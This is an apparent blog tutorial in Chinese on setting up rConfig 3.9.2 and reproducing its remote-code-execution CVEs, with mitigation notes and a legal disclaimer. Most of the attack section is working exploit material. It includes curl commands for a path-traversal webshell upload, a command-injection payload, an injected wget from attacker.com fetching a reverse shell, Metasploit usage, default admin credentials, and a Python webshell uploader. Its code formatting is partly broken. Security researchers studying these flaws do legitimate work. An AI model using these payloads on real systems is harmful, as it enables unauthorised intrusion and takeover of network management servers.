# 如何進行rConfig-CVE漏洞復現及環境搭建
## 前言
rConfig是一款開源的網絡設備配置管理工具,廣泛用于企業網絡管理中。近年來,rConfig被曝出多個高危漏洞(如CVE-2019-16662、CVE-2019-16663等),這些漏洞可能導致遠程代碼執行(RCE)和敏感信息泄露。本文將通過完整的實驗環境搭建和漏洞復現過程,幫助安全研究人員深入理解這些漏洞的利用方式。
---
## 一、漏洞背景
### 1.1 受影響版本
- rConfig 3.9.2及更早版本
- 關鍵CVE編號:
- **CVE-2019-16662**:未授權RCE漏洞
- **CVE-2019-16663**:認證后RCE漏洞
### 1.2 漏洞原理
- **文件上傳繞過**:通過構造惡意請求繞過上傳限制
- **命令注入**:`ajaxServerSettingsChk.php`等文件未過濾用戶輸入
- **路徑遍歷**:`lib/crud/userprocess.php`存在目錄穿越
---
## 二、環境搭建
### 2.1 實驗環境要求
- **操作系統**:Kali Linux 2023/Ubuntu 20.04
- **依賴組件**:
- Apache 2.4+
- PHP 5.6/7.0(需兼容舊版rConfig)
- MySQL 5.7
- **網絡配置**:NAT模式(建議使用虛擬機)
### 2.2 安裝步驟
#### 步驟1:下載rConfig 3.9.2
```bash
wget https://github.com/rconfig/rconfig/archive/v3.9.2.zip
unzip v3.9.2.zip -d /var/www/html/
chown -R www-data:www-data /var/www/html/rconfig-3.9.2
CREATE DATABASE rconfig;
GRANT ALL PRIVILEGES ON rconfig.* TO 'rconfig'@'localhost' IDENTIFIED BY 'P@ssw0rd';
FLUSH PRIVILEGES;
# /etc/php/7.0/apache2/php.ini
allow_url_fopen = On
allow_url_include = On
訪問 http://localhost/rconfig-3.9.2/install 按向導完成安裝。
注意:安裝后務必刪除
install目錄!
漏洞文件:lib/crud/userprocess.php
curl -X POST "http://<target>/lib/crud/userprocess.php" \
-F "file=@/tmp/shell.php" \
-F "userid=../../../../../../../../var/www/html/shell"
curl http://<target>/shell.php -d "system=id"
漏洞文件:install/lib/ajaxHandlers/ajaxServerSettingsChk.php
curl "http://<target>/install/lib/ajaxHandlers/ajaxServerSettingsChk.php" \
-d "rootpw=1|id>&2"
前置條件:需獲取有效管理員憑證(默認admin/rconfig)
POST /commands.inc.php HTTP/1.1
Host: <target>
Cookie: PHPSESSID=<session_id>
backupDir=;/usr/bin/wget+http://attacker.com/revshell+-O+/tmp/revshell
.htaccess限制文件上傳類型exec()/system()函數參數# Apache配置示例
<Directory "/var/www/html/rconfig/lib/crud">
Order Deny,Allow
Deny from all
</Directory>
msf6 > use exploit/unix/webapp/rconfig_ajaxsave_rce
msf6 > set RHOSTS <target>
msf6 > exploit
import requests
target = "http://192.168.1.100"
payload = "<?php system($_GET['cmd']);?>"
files = {'file': ('shell.php', payload)}
requests.post(f"{target}/lib/crud/userprocess.php", files=files)
通過本實驗,我們驗證了rConfig多個高危漏洞的利用鏈。安全團隊應重點關注: 1. 網絡管理系統的輸入驗證 2. 最小權限原則的應用 3. 定期進行安全審計
法律聲明:本實驗僅限授權測試,未經許可不得對真實系統進行漏洞利用。
”`
注:實際執行時需根據具體環境調整路徑和參數,建議在隔離的虛擬化環境中操作。文中部分Payload已做無害化處理。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。